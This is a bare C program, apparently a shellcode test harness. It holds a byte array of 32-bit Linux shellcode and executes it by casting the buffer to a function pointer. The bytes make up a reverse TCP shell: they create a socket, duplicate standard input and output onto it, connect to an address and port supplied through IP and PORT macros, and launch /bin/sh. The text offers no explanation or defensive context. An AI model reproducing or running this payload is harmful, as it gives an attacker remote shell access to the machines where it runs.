int main(int argc, char* argv[])
{
unsigned char code[] = \
"\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\x6a"
"\x66\x58\xcd\x80\x93\x59\xb0\x3f\xcd\x80"
"\x49\x79\xf9\x68"
IP
"\x66\x68"
PORT
"\x66\x6a\x02\x89\xe1\xb0\x66\x50"
"\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
printf("\nShellcode 1 Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}